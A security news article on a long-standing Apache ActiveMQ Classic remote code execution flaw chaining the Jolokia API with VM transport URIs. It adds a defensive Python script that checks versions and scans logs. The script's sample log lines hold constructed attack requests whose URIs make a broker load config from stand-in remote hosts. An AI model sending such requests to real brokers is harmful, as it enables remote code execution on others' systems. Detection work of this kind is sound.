Critical Apache ActiveMQ Vulnerability Exposed After 13-Year Wait


Apache ActiveMQ Classic Vulnerability

A severe remote code execution (RCE) vulnerability existed in Apache ActiveMQ Classic for approximately 13 years before being discovered in 2026.

Background

The RCE bug was found by abusing the Jolokia API to make the broker download content and execute arbitrary operating system commands. The flaw originated from a bypass of CVE-2022-41678, an earlier issue that let attackers write web shells to disk by invoking specific Java Development Kit (JDK) Management Beans.

According to the report, “Developers introduced a flag enabling all operations on ActiveMQ Management Beans to be callable through the Jolokia API. However, this fix created a new avenue for exploitation.”

Exploitation

  • An attacker could target ActiveMQ's VM transport, the feature that lets an application create an embedded broker. When a VM transport URI references a broker that does not exist, ActiveMQ creates one and honours URI parameters telling it where to load its configuration from, including from a potentially malicious URL.
  • By chaining these two issues, an attacker could make the broker instantiate an attacker-supplied Spring XML configuration file, leading to RCE.
  • In some cases the exploit requires no authentication at all, because CVE-2024-32114 exposed Jolokia to unauthenticated users in ActiveMQ 6.x, leaving the API fully reachable without credentials.

Resolution

The disclosed vulnerability has been fixed in ActiveMQ Classic versions 5.19.4 and 6.2.3. Users are advised to upgrade their installations as soon as possible.
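The following is an added example, not code from the article or from the ActiveMQ project. It covers both points above from a defender's side: a version check against the fixed releases named in the article, and a scan of Jolokia request log lines for VM transport URIs whose options point the broker at a remote location. The log lines, host addresses and the `config` option name are constructed for illustration; the check keys on the remote URL in the option value, not on the option name.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Fixed releases named in the article; earlier releases on the same line are treated as affected.
FIXED_VERSIONS = {5: (5, 19, 4), 6: (6, 2, 3)}
REMOTE_SCHEME = re.compile(r"\b(?:https?|ftp)://", re.IGNORECASE)


def is_affected(version):
    """True if an ActiveMQ Classic version predates the fix on its release line, None if unknown."""
    m = re.match(r"(\d+)\.(\d+)\.(\d+)", version)
    if not m:
        return None
    major, minor, patch = (int(p) for p in m.groups())
    fixed = FIXED_VERSIONS.get(major)
    return None if fixed is None else (major, minor, patch) < fixed


def suspicious_vm_uris(log_line):
    """Return VM transport URIs in a request line whose options reference a remote URL.

    A vm: URI arriving through Jolokia is already unusual; one that asks the broker to fetch
    its configuration over the network matches the chain described in the article."""
    findings = []
    decoded = unquote(log_line)  # Jolokia requests often carry the URI percent-encoded
    for uri in re.findall(r"\bvm:[^\s\"']+", decoded):
        options = parse_qsl(urlsplit(uri).query, keep_blank_values=True)
        if any(REMOTE_SCHEME.search(value) for _, value in options):
            findings.append(uri)
    return findings


def scan(lines):
    """Return (line_index, uri) pairs for every suspicious VM transport URI found."""
    return [(i, uri) for i, line in enumerate(lines) for uri in suspicious_vm_uris(line)]


# Constructed sample lines in an access-log style; addresses are documentation ranges.
LOG_LINES = [
    '10.0.0.5 - - "GET /api/jolokia/read/org.apache.activemq:type=Broker,brokerName=localhost HTTP/1.1" 200',
    '10.0.0.9 - - "POST /api/jolokia/ HTTP/1.1" 200 {"type":"exec","arguments":["vm://nosuchbroker?config=xbean:http://203.0.113.7/evil.xml"]}',
    '10.0.0.9 - - "GET /api/jolokia/exec/x/vm%3A%2F%2Fghost%3Fconfig%3Dxbean%3Ahttps%3A%2F%2F198.51.100.2%2Fb.xml HTTP/1.1" 200',
    '10.0.0.7 - - "POST /api/jolokia/ HTTP/1.1" 200 {"arguments":["vm://localhost?broker.persistent=false"]}',
]

if __name__ == "__main__":
    print("5.18.3 affected:", is_affected("5.18.3"))
    for idx, uri in scan(LOG_LINES):
        print(f"line {idx}: {uri}")
```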
